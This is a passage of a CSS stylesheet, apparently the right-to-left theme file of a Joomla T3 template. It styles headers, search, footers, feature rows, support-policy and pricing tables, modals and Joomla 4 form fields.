  .page-masthead .jumbotron {
    padding-top: 40px;
    padding-bottom: 40px;
  }
}
@media screen and (max-width: 767px) {
  .page-masthead .jumbotron {
    padding-right: 20px;
  }
  .page-masthead .jumbotron .container {
    padding: 0;
  }
}
.label {
  border-radius: 0;
}
.label:empty {
  display: none;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.page-header .label,
.page-header .badge {
  vertical-align: middle;
}
.thumbnail {
  padding: 0;
  margin-bottom: 40px;
}
.alert h4 {
  color: inherit;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-left: 10px;
}
.media > .pull-right {
  margin-right: 10px;
}
.list-group-item > .badge {
  float: left;
}
.list-group-item > .badge + .badge {
  margin-left: 5px;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
  color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
  color: #ff9999;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title > a {
  color: inherit;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  border-bottom: 0;
  padding: 20px 40px 0;
}
.modal-title {
  font-size: 35px;
}
.modal-body {
  padding: 10px 40px 20px;
}
.modal-body iframe {
  width: 100%;
  max-height: none;
  border: 0 !important;
}
@media screen and (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
}

.logo {
  position: absolute;
  top: 0;
  right: 0;
  padding: 0;
  margin: 0;
}
.logo a {
  background: transparent;
  color: #fff;
  text-decoration: none;
  display: inline-block;
  line-height: 1;
  margin: 0;
}
.logo:hover a,
.logo a:hover,
.logo a:active,
.logo a:focus {
  background: #b30000;
  color: #ffffff;
  text-decoration: none;
}
@media screen and (min-width: 991px) {
  .logo {
    position: static;
  }
  .logo a {
    background: #b30000;
  }
  .logo:hover a,
  .logo a:hover,
  .logo a:active,
  .logo a:focus {
    color: #ffffff;
  }
}
.off-canvas-toggle + .container .navbar-header .logo {
  right: 55px;
  border-right: 1px solid #b30000;
}
@media screen and (min-width: 991px) {
  .off-canvas-toggle + .container .navbar-header .logo {
    border-right: 0;
  }
}
.logo-image > a {
  max-width: 160px;
  max-height: 55px;
}
.logo-image > a > img {
  max-width: 100%;
}
.logo-image span,
.logo-image small {
  display: none;
}
.logo-text {
  text-transform: uppercase;
  font-size: 18px;
}
.logo-text a {
  line-height: 55px;
  padding: 0 20px;
}
.logo-text .site-slogan {
  display: none;
}
.head-search {
  height: 55px;
  position: absolute;
  left: 0;
  margin: 0;
  z-index: 1000;
}
.head-search form {
  margin: 0;
}
.head-search label {
  display: none;
}
.head-search .search {
  background: #cc0000;
  border-right: 1px solid #b30000;
  border-left: 1px solid #b30000;
  position: relative;
}
@media screen and (min-width: 991px) {
  .head-search .search {
    background: #b30000;
  }
}
.head-search .search .fa-search {
  color: #ffcccc;
  content: "\f002";
  display: block;
  font-family: "FontAwesome";
  position: absolute;
  right: 20px;
  top: 19px;
  z-index: 1;
}
.head-search .search .fa-search:hover {
  z-index: 0;
}
.head-search .form-control {
  border: 0;
  background: transparent;
  color: #ffcccc;
  height: 54px;
  line-height: 35px;
  position: relative;
  margin: 0;
  padding: 10px 40px 10px 15px;
  width: 0;
  -webkit-transition: width 0.2s;
  -o-transition: width 0.2s;
  transition: width 0.2s;
}
@media screen and (min-width: 991px) {
  .head-search .form-control {
    height: 55px;
  }
}
.head-search .form-control:hover,
.head-search .form-control:active,
.head-search .form-control:focus {
  color: #ffffff;
  box-shadow: none;
}
.head-search .form-control:active,
.head-search .form-control:focus {
  width: 180px;
}
.head-search .form-control:-webkit-autofill {
  -webkit-box-shadow: 0 1000px 0 0 #0067a2 inset;
  -webkit-text-fill-color: #ffffff;
}
.head-search .form-control::-moz-placeholder {
  color: #ffffff;
}
.head-search .mod-finder input {
  z-index: 10;
}
.head-search .mod-finder > .awesomplete {
  position: relative;
}
.head-search .mod-finder > .awesomplete::after {
  content: '\f002';
  color: #bbe6ff;
  display: inline-block;
  font-family: "FontAwesome";
  height: 16px;
  width: 16px;
  position: absolute;
  top: 19px;
  margin-right: 20px;
}
.head-search .mod-finder .mod-finder__search input {
  width: 100px;
  padding: 10px 15px;
}
@media screen and (max-width: 576px) {
  .head-search .mod-finder .mod-finder__search input {
    width: 50px;
  }
}
.head-search .mod-finder .mod-finder__search input:focus {
  width: 200px;
}
.navbar-toggle + .head-search {
  left: 55px;
  max-width: 57px;
}
@media screen and (max-width: 990px) {
  .navbar-toggle + .head-search {
    max-width: inherit;
  }
  .navbar-toggle + .head-search:hover,
  .navbar-toggle + .head-search:focus,
  .navbar-toggle + .head-search:active {
    max-width: none;
  }
  .navbar-toggle + .head-search:hover .form-control,
  .navbar-toggle + .head-search:focus .form-control,
  .navbar-toggle + .head-search:active .form-control {
    width: 180px;
  }
}
@media screen and (min-width: 991px) {
  .head-search,
  .navbar-toggle + .head-search {
    left: 20px;
    top: 0;
    max-width: none;
  }
}
.chzn-container-multi .chzn-choices li.search-field input[type="text"] {
  height: 30px;
}
.chzn-container {
  max-width: 100%;
}
.chzn-container .chzn-single {
  max-width: 260px;
}
.ie8 .radio.t3onoff {
  border: 0;
}
.ie8 label.on,
.ie8 label.off {
  border: 1px solid #eeeeee;
}
.pagination > li > a,
.pagination > li > span {
  margin-bottom: 10px;
}
#eblog-wrapper {
  line-height: 1.625;
}
.com_weblinks .weblink-categories .page-header.item-title .btn {
  padding: 5px;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-minus {
  display: block;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-plus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-minus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-plus {
  display: block;
}
.t3-spotlight {
  display: -webkit-flex;
  display: flex;
  -webkit-flex-flow: row wrap;
  flex-flow: row wrap;
}
@media screen and (max-width: 767px) {
  .t3-spotlight > div {
    margin-bottom: 20px;
  }
}
@media screen and (min-width: 992px) {
  .t3-spotlight:not(:root:root) .col-md-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-md-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-md-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-md-12 {
    width: 100%;
  }
}
@media screen and (max-width: 991px) {
  .t3-spotlight:not(:root:root) .col-sm-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-sm-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-sm-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-sm-12 {
    width: 100%;
  }
}
@media screen and (max-width: 767px) {
  .t3-spotlight:not(:root:root) .col-xs-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-xs-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-xs-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-xs-12 {
    width: 100%;
  }
}
.t3-sl {
  padding-bottom: 40px;
  padding-top: 40px;
}
@media screen and (max-width: 767px) {
  .t3-sl {
    padding-bottom: 20px;
    padding-top: 20px;
  }
}
.t3-sl .t3-module {
  margin-bottom: 0;
}
.t3-sl .t3-module + .t3-module {
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  .t3-sl {
    padding-bottom: 60px;
    padding-top: 60px;
  }
}
.t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.t3-mainbody {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-content {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-sidebar {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-footer {
  background: #f7f7f7;
  color: #666666;
}
.t3-footer:before,
.t3-footer:after {
  display: table;
  content: " ";
}
.t3-footer:after {
  clear: both;
}
.t3-footer small {
  display: block;
  font-size: 100%;
}
.t3-footer-sl {
  padding: 20px 0;
}
.t3-footer-sl:before,
.t3-footer-sl:after {
  display: table;
  content: " ";
}
.t3-footer-sl:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .t3-footer-sl {
    padding: 40px 0;
  }
}
.t3-footer-sl .t3-module {
  background: #f7f7f7;
  color: #666666;
  margin-top: 10px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module .module-title {
  color: #444444;
  font-size: 18px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module ul {
  list-style: none;
  margin-right: 0;
  margin-bottom: 0;
  padding-right: 0;
}
.t3-footer-sl .t3-module ul > li {
  line-height: 24px;
}
.t3-footer-sl .t3-module ul > li > a {
  color: #666666;
}
.t3-footer-sl .t3-module ul > li > a:hover,
.t3-footer-sl .t3-module ul > li > a:active,
.t3-footer-sl .t3-module ul > li > a:focus {
  color: #666666;
}
#back-to-top {
  z-index: 999;
  position: fixed;
  left: 20px;
  top: auto;
}
#back-to-top.affix {
  bottom: 40px;
}
#back-to-top a {
  outline: none;
}
#back-to-top i {
  font-size: 28px;
}
.t3-copyright {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding: 40px 0 80px;
}
.t3-copyright:before,
.t3-copyright:after {
  display: table;
  content: " ";
}
.t3-copyright:after {
  clear: both;
}
.t3-copyright small {
  margin-bottom: 5px;
}
.copyright {
  margin-bottom: 20px;
}
.poweredby:before,
.poweredby:after {
  display: table;
  content: " ";
}
.poweredby:after {
  clear: both;
}
@media screen and (min-width: 991px) {
  .poweredby {
    text-align: left;
  }
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
  display: inline-block;
}
.mod-preview-info {
  z-index: 2000;
}
#ezblog-body .blog-text p,
#ezblog-body .blog-text li {
  line-height: 1.625;
}
.features-intro .t3-content {
  padding-top: 0;
  padding-bottom: 0;
}
.row-feature {
  border-top: 1px solid #eeeeee;
  padding: 40px 0;
  font-size: 16px;
  color: #666666;
  line-height: 1.5;
}
.page-masthead .row-feature {
  padding: 40px 0;
}
@media screen and (min-width: 992px) {
  .row-feature {
    padding: 60px 0;
  }
  .page-masthead .row-feature {
    padding: 100px 0;
  }
}
.row-feature h1,
.row-feature h2,
.row-feature h3 {
  line-height: 1.15;
  color: #444444;
}
.row-feature h1 {
  margin-top: 0;
  margin-bottom: 60px;
  font-weight: 300;
}
@media screen and (min-width: 768px) {
  .row-feature h1 {
    font-size: 84px;
  }
}
.row-feature h1 + p {
  margin-top: -55px;
}
.row-feature h2 {
  margin-top: 0;
  margin-bottom: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature h2 {
    font-size: 42px;
  }
}
.row-feature h3 {
  margin-top: 20px;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .row-feature h3 {
    font-size: 27.6px;
  }
}
.row-feature h3 + p {
  margin-top: -10px;
}
.row-feature .feature-ct {
  width: 100%;
  padding-top: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image + .feature-ct {
    width: 50%;
    float: left;
    padding-right: 20px;
  }
  .row-feature .pull-right.item-image + .feature-ct {
    width: 50%;
    float: right;
    padding-left: 20px;
  }
}
.row-feature.text-center {
  text-align: center;
}
.row-feature.row-feature-alt,
.row-feature:nth-child(even) {
  background: #f7f7f7;
}
.row-feature.row-feature-primary {
  background: #cc0000;
  color: #ffcccc;
}
.row-feature.row-feature-primary h1,
.row-feature.row-feature-primary h2,
.row-feature.row-feature-primary h3 {
  color: #ffffff;
}
.row-feature.row-feature-primary .feature-ct,
.row-feature.row-feature-primary p {
  color: #ffcccc;
}
.row-feature.row-feature-primary .btn-primary {
  border-color: #fff;
}
.row-feature.row-feature-primary + .row-feature-primary {
  border-top: 1px solid #990000;
}
.row-feature .row-feature-narrow {
  padding-top: 20px;
  padding-bottom: 20px;
}
.row-feature:first-child {
  border-top: 0;
}
.row-feature .item-image {
  width: 100%;
  float: none;
  margin-bottom: 20px;
}
.row-feature .item-image img {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image,
  .row-feature .pull-right.item-image {
    max-width: 50%;
    min-width: 25%;
    margin-bottom: 0;
  }
  .row-feature .pull-left.item-image {
    float: right;
    text-align: right;
    padding-left: 20px;
  }
  .row-feature .pull-right.item-image {
    float: left;
    text-align: left;
    padding-right: 20px;
  }
}
.row-feature .page-header {
  border: 0;
  margin: 0 0 20px;
  padding: 0;
}
.row-feature .jumbotron {
  background: transparent;
  position: relative;
  margin-top: 0;
  margin-bottom: 20px;
  padding-top: 0;
  padding-bottom: 0;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .row-feature .jumbotron {
    margin-bottom: 60px;
  }
}
.row-feature .gallery .thumbnail {
  border: 0;
  padding: 0;
}
.row-feature .gallery .thumbnail a {
  display: block;
  border: 1px solid #eeeeee;
  padding: 3px;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.row-feature .gallery .thumbnail a img {
  width: 100%;
  padding: 0;
}
.row-feature .gallery .thumbnail a:hover,
.row-feature .gallery .thumbnail a:focus,
.row-feature .gallery .thumbnail a:active {
  border-color: #bbbbbb;
}
.row-feature .gallery .thumbnail a:hover img,
.row-feature .gallery .thumbnail a:focus img,
.row-feature .gallery .thumbnail a:active img {
  opacity: .7;
}
.support-policy .row-support-policy {
  margin-bottom: 20px;
}
.support-policy .policy-item {
  margin-bottom: 20px;
  border: 1px solid #eeeeee;
}
.support-policy .policy-item .col-type {
  position: relative;
  height: 100px;
  border-bottom: 1px solid #eeeeee;
  background: #f7f7f7;
}
.support-policy .policy-item .col-type h3 {
  position: absolute;
  bottom: 10px;
  right: 20px;
}
.support-policy .policy-item .col-detail {
  height: 200px;
  padding: 20px;
}
.support-policy .policy-item .col-level {
  height: 80px;
  background: #444444;
  color: #fff;
  position: relative;
}
.support-policy .policy-item .col-level .face,
.support-policy .policy-item .col-level .count-up,
.support-policy .policy-item .col-level > strong {
  height: 80px;
  line-height: 80px;
}
.support-policy .policy-item .col-level .level-info {
  width: 160px;
  position: absolute;
  right: 0;
  bottom: 0;
}
.support-policy .policy-item .col-level .level-info .face {
  background-image: url(../../../images/emoticons.png);
  background-repeat: no-repeat;
  background-color: rgba(0, 0, 0, 0.35);
  display: table-cell;
  width: 80px;
  border-left: 1px solid rgba(0, 0, 0, 0.2);
}
.support-policy .policy-item .col-level .level-info .count-up {
  width: 80px;
  border-left: 1px solid rgba(0, 0, 0, 0.2);
  background-color: rgba(0, 0, 0, 0.15);
  display: table-cell;
  vertical-align: middle;
  text-align: center;
  font-size: 18px;
  font-weight: bold;
}
.support-policy .policy-item .col-level strong {
  width: 100%;
  color: #ffffff;
  display: block;
  float: right;
  font-weight: bold;
  padding-right: 180px;
  font-size: 18px;
}
.support-policy .policy-item .col-level.level-1 strong {
  background: #3e9b52;
}
.support-policy .policy-item .col-level.level-1 .face {
  background-position: 0px 0px;
}
.support-policy .policy-item .col-level.level-2 strong {
  background: #2f773f;
}
.support-policy .policy-item .col-level.level-2 .face {
  background-position: 0px -80px;
}
.support-policy .policy-item .col-level.level-3 strong {
  background: #ffcc00;
}
.support-policy .policy-item .col-level.level-3 .face {
  background-position: 0px -160px;
}
.support-policy .policy-item .col-level.level-4 strong {
  background: #cca300;
}
.support-policy .policy-item .col-level.level-4 .face {
  background-position: 0px -240px;
}
.support-policy .policy-item .col-level.level-5 strong {
  background-color: #ff8800;
}
.support-policy .policy-item .col-level.level-5 .face {
  background-position: 0px -320px;
}
.support-policy .policy-item .col-level.level-6 strong {
  background: #cc0000;
}
.support-policy .policy-item .col-level.level-6 .face {
  background-position: 0px -400px;
}
.support-policy:hover {
  background: #ffffff;
  border-color: #eeeeee;
}
.support-policy:hover .level-info .face {
  top: -70px;
}
.support-policy:hover .level-info .count-up {
  bottom: 0;
}
.support-policy.style2 {
  margin-bottom: 60px;
}
.support-policy .row-heading {
  background: #444444;
  color: #ffffff;
  overflow: hidden;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading {
    display: table;
    width: 100%;
  }
}
.support-policy .row-heading > div {
  border-left: 1px solid #5e5e5e;
  font-size: 12px;
  font-weight: bold;
  padding: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-heading > div {
    font-size: 15px;
    display: table-cell;
  }
}
.support-policy .row-body {
  border-right: 1px solid #eeeeee;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body {
    display: table;
    width: 100%;
    margin-bottom: 0;
  }
}
.support-policy .row-body > div {
  border-left: 1px solid #eeeeee;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 20px;
  vertical-align: middle;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body > div {
    display: table-cell;
    float: none;
  }
}
.support-policy .row-body .col-type {
  background: #444444;
  color: #ffffff;
  font-size: 16px;
  font-weight: bold;
}
@media screen and (min-width: 768px) {
  .support-policy .row-body .col-type {
    background: transparent;
    color: #444444;
  }
}
.support-policy .row-body .col-level {
  font-size: 32px;
  text-align: center;
}
.support-policy .row-body .col-status {
  border-bottom: 0;
}
.support-policy .row-body .col-status .face {
  background-image: url(../../../images/emoticons.png);
  background-repeat: no-repeat;
  display: block;
  height: 80px;
  margin: 0 auto;
  width: 80px;
}
.support-policy .row-body .col-status strong {
  color: #ffffff;
  display: block;
  padding: 3px 0;
  text-align: center;
}
.support-policy .row-body.level-1 .col-status {
  background: #3e9b52;
}
.support-policy .row-body.level-1 .col-status .face {
  background-position: 0px 0px;
}
.support-policy .row-body.level-2 .col-status {
  background: #44aa5a;
}
.support-policy .row-body.level-2 .col-status .face {
  background-position: 0px -80px;
}
.support-policy .row-body.level-3 .col-status {
  background: #4bb762;
}
.support-policy .row-body.level-3 .col-status .face {
  background-position: 0px -160px;
}
.support-policy .row-body.level-4 .col-status {
  background: #59bd6f;
}
.support-policy .row-body.level-4 .col-status .face {
  background-position: 0px -240px;
}
.support-policy .row-body.level-5 .col-status {
  background: #68c37b;
}
.support-policy .row-body.level-5 .col-status .face {
  background-position: 0px -320px;
}
.support-policy .row-body.level-6 .col-status {
  background: #77c888;
}
.support-policy .row-body.level-6 .col-status .face {
  background-position: 0px -400px;
}
.support-policy .row-alt {
  background: #f7f7f7;
}
.support-policy .support-yes {
  color: #3e9b52;
}
.support-policy .support-no {
  color: #e1e1e1;
}
.pricing-table {
  padding-top: 40px;
  padding-bottom: 100px;
}
.pricing-table .col {
  margin-bottom: 40px;
}
@media (min-width: 992px) {
  .pricing-table .col {
    margin-bottom: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.no-padding {
    padding: 0;
  }
}
@media (min-width: 768px) {
  .pricing-table .col.shadow {
    box-shadow: 0 5px 0 0 rgba(0, 0, 0, 0.2);
  }
}
.pricing-table .col .big-number {
  display: inline-block;
  font-size: 70px;
}
.pricing-table .col .big-number sup {
  font-size: 28px;
  top: -1em;
}
.pricing-table .col .btn {
  font-size: 20px;
  padding: 10px 20px;
}
.pricing-table .col .col-header {
  background: #666666;
  color: #ffffff;
  padding: 10px 20px;
}
.pricing-table .col ul {
  border: 1px solid #eeeeee;
  border-bottom: 0;
  list-style: none;
  margin: 0;
  padding: 0;
}
.pricing-table .col ul li {
  border-bottom: 1px solid #eeeeee;
  font-size: 16px;
  padding: 10px 20px;
  text-align: center;
}
.pricing-table .col ul li.row1 {
  background: #f7f7f7;
}
.pricing-table .col ul li i {
  color: #3e9b52;
  font-size: 18px;
}
.pricing-table .col ul li.no i {
  color: #cc0000;
}
.pricing-table .col ul li.no {
  color: #999999;
  text-decoration: line-through;
}
.pricing-table .col .col-footer {
  background: #eeeeee;
  border: 1px solid #d5d5d5;
  padding: 20px;
}
.pricing-table .col-feature {
  z-index: 200;
}
@media screen and (min-width: 992px) {
  .pricing-table .col-feature {
    margin-top: -20px;
  }
}
.pricing-table .col-feature .col-header {
  background: #cc0000;
  padding: 20px 20px;
}
.pricing-table.style2 .col:first-child .col-header {
  border-radius: 0 5px 0 0;
}
.pricing-table.style2 .col:first-child .col-footer {
  border-radius: 0 0 5px 0;
}
.pricing-table.style2 .col:last-child .col-header {
  border-radius: 5px 0 0 0;
}
.pricing-table.style2 .col:last-child .col-footer {
  border-radius: 0 0 0 5px;
}
.pricing-table.style2 .col-feature {
  border-radius: 5px;
}
.pricing-table.style2 .col-feature .col-header {
  border-radius: 5px 5px 0 0;
}
.pricing-table.style2 .col-feature .col-footer {
  border-radius: 0 0 5px 5px;
}
.our-team .lead {
  margin-bottom: 60px;
}
.our-team .thumbnail {
  text-align: center;
  border: 0;
  padding: 0 20px;
}
.our-team .thumbnail .caption {
  padding-bottom: 20px;
}
.our-team .thumbnail h3 {
  margin-bottom: 5px;
}
.our-team .thumbnail .btn {
  border-radius: 50%;
  height: 32px;
  line-height: 32px;
  margin: 0 2px;
  padding: 0;
  text-align: center;
  width: 32px;
}
.our-team .thumbnail .btn:hover {
  background: #cc0000;
  border-color: #cc0000;
  color: #ffffff;
}
.control-group .controls script + .row-fluid {
  margin-right: 0;
}
.control-group .controls script + .row-fluid + .row-fluid {
  margin-right: 0;
}
.video-wrapper {
  position: relative;
  padding-bottom: 51%;
  padding-top: 30px;
  height: 0;
}
.video-wrapper iframe {
  position: absolute;
  top: 0;
  right: 0;
  width: 100%;
  height: 100%;
}

.sr-only,
.visually-hidden,
.visually-hidden-focusable:not(:focus):not(:focus-within) {
  position: absolute !important;
  width: 1px !important;
  height: 1px !important;
  padding: 0 !important;
  margin: -1px !important;
  overflow: hidden !important;
  clip: rect(0, 0, 0, 0) !important;
  white-space: nowrap !important;
  border: 0 !important;
}
.btn-close {
  background: #f0f0f0;
  border: 0;
  border-radius: 50%;
  color: #999;
  height: 32px;
  text-align: center;
  width: 32px;
  margin-right: auto;
  appearance: none;
  -moz-appearance: none;
  -webkit-appearance: none;
}
.btn-close::before {
  content: "\f00d";
  display: block;
  font-family: FontAwesome3 !important;
  font-size: 16px;
}
.btn-close:hover {
  cursor: pointer;
  color: #666;
}
.field-calendar .input-group input[type="text"] {
  border-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.field-calendar .input-group .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.field-calendar a:hover,
.field-calendar a:focus,
.field-calendar a:active {
  cursor: pointer;
}
joomla-field-custom.field-custom-wrapper .input-group {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group input[type="text"] {
  border-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn {
  display: flex;
  align-items: stretch;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn {
  border-radius: 0;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select {
  background-color: #2f7d32;
  border-color: #2f7d32;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-select:active {
  background-color: #296e2c;
  border-color: #296e2c;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear {
  background-color: #c52827;
  border: 1px solid #c52827;
  border-top-left-radius: 5px;
  border-bottom-left-radius: 5px;
  color: #fff;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:hover,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:focus,
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn.button-clear:active {
  background-color: #ae2322;
  border-color: #c52827;
}
joomla-field-custom.field-custom-wrapper .input-group .input-group-btn .btn span {
  line-height: 38px;
}
.input-group {
  position: relative;
  display: flex;
  flex-wrap: nowrap;
  align-items: stretch;
  width: 100%;
}
.input-group .form-control {
  width: auto;
}
.input-group .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.com-tags-tag.tag-category .filters {
  display: flex;
  align-items: center;
}
.users-profile-custom-joomlatoken .dl-horizontal dd {
  text-overflow: ellipsis;
  overflow: hidden;
  white-space: nowrap;
  width: 400px;
}
.com-finder .form-inline > label {
  margin-bottom: 10px;
}
.com-finder .input-group {
  display: flex;
  align-items: center;
}
.com-finder .input-group .btn:last-of-type {
  border-radius: 5px;
  margin-right: 10px;
}
.j40 joomla-field-media .input-group {
  max-width: 356px;
}
.j40 joomla-field-media .input-group input[type="text"] {
  border-left: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.j40 joomla-field-media .input-group .form-control {
  border-top-right-radius: 0;
  flex: 1;
}
.j40 joomla-field-media .input-group .btn {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.j40 joomla-field-media .input-group .icon-times::before {
  content: "\f00d";
  display: inline-block;
  font-weight: FontAwesome;
  font-size: 16px;
}
.j40 .form-control-feedback {
  font-size: 12px;
  font-weight: 400;
  top: auto;
  bottom: -28px;
  line-height: 1;
  width: auto;
  white-space: nowrap;
}
.j40 .com-newsfeeds-newsfeed__items {
  margin: 0;
  padding: 0;
  list-style: none;
}
.j40 .com-newsfeeds-newsfeed__items li {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
.j40 .com-newsfeeds-newsfeed__items .feed-link {
  margin-bottom: 20px;
}
.j40 figure {
  margin-bottom: 20px;
}
.j40 figure img {
  max-width: 100%;
}
.j40 #com-contact-form {
  margin-bottom: 20px;
}
.j40 .request-confirm fieldset legend {
  font-size: 16px;
  padding-bottom: 20px;
}
.j40 .article-aside .icons {
  float: left;
}
.j40 .article-aside .icons a {
  display: block;
  position: relative;
}
.j40 .article-aside .icons [role="tooltip"] {
  background-color: rgba(0, 0, 0, 0.6);
  border-radius: 3px;
  color: #fff;
  display: none;
  padding: 2px 4px;
  position: absolute;
  white-space: nowrap;
  left: 0;
  max-width: none;
}
.j40 .article-aside .icons:hover [role="tooltip"] {
  display: block;
}
.j40 .password-group .input-group {
  display: flex;
  flex-wrap: nowrap;
}
.j40 .password-group .input-group input {
  width: auto;
}
.j40 .edit.item-page .choices__inner {
  padding-left: 6px;
}
.j40 .edit.item-page .choices__inner button {
  background-color: rgba(255, 255, 255, 0.3);
  border-radius: 8px;
  border: 0;
  margin-right: 6px;
  padding: 1px 6px;
}
.j40 .edit.item-page .choices__inner button:hover,
.j40 .edit.item-page .choices__inner button:focus,
.j40 .edit.item-page .choices__inner button:active {
  background-color: rgba(255, 255, 255, 0.5);
  cursor: pointer;
}
.profile-edit .password-group .input-group input {
  min-width: 268px;
}
.profile-edit .control-group {
  margin-top: 20px;
}
.profile-edit .control-group .controls {
  float: none;
}
.j40 .joomla-modal.show,
.j42 .joomla-modal.show {
  background-color: rgba(0, 0, 0, 0.5);
  opacity: 1;
}
.j40 .joomla-modal.show .modal-dialog,
.j42 .joomla-modal.show .modal-dialog {
  top: 50%;
  transform: translateY(-50%);
}
.j40 .joomla-modal.show .modal-dialog .modal-content,
.j42 .joomla-modal.show .modal-dialog .modal-content {
  border-radius: 5px;
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
}
.j40 .jviewport-width80,
.j42 .jviewport-width80 {
  width: 80vw;
}
.j40 .jviewport-height70,
.j42 .jviewport-height70 {
  height: 70vh;
}
.j40 .modal-header,
.j42 .modal-header {
  align-items: center;
  border-bottom: 1px solid #ddd;
  display: flex;
  padding: 12px 16px;
  justify-content: space-between;
}
.j40 .modal-header h3,
.j42 .modal-header h3 {
  font-size: 24px;
  font-weight: 500;
}
.j40 .modal-body,
.j42 .modal-body {
  overflow: hidden;
  padding: 0;
}
.j40 .iframe,
.j42 .iframe {
  border: 0;
  height: 100%;
  width: 100%;
}
.j40 [role=tooltip]:not(.show),
.j42 [role=tooltip]:not(.show) {
  left: 5em;
  z-index: 1070;
  display: none;
  max-width: 100%;
  padding: .5em;
  margin: .5em;
  color: #000;
  text-align: start;
  background: #fff;
  border: 1px solid #6d757e;
  border-radius: .25rem;
}
.j40 .container-popup [id="filter[search]-desc"],
.j42 .container-popup [id="filter[search]-desc"] {
  top: 100%;
  bottom: auto;
}
.j40 .btn-toolbar,
.j40 .js-stools-container-filters {
  display: flex;
  flex-wrap: wrap;
  justify-content: flex-end;
  align-items: center;
}
.j40 .ordering-select {
  display: flex;
  align-items: center;
}
.j40 .btn-group {
  margin-left: 10px;
}
.j40 .js-stools-container-filters {
  display: none;
  margin-top: 20px;
}
.j40 .js-stools-container-filters.js-stools-container-filters-visible {
  display: flex;
}
.j40 .js-stools-container-filters .js-stools-field-filter {
  margin-left: 10px;
}
.j40 .js-stools-container-filters .js-stools-field-filter:last-child {
  margin-left: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner {
  border: 0;
  min-height: auto;
  padding: 0;
}
.j40 .js-stools-container-filters .choices .choices__inner input {
  margin-bottom: 0;
}
.j40 #contact-form label.required {
  position: relative;
}
.j40 #contact-form label.required .form-control-feedback {
  background: #fff;
  border-radius: .5rem;
  box-shadow: 2px 2px 5px rgba(0, 0, 0, 0.1);
  border: 1px solid #e5e7eb;
  display: flex;
  align-items: center;
  justify-content: center;
  padding: 0 .5rem;
  left: auto;
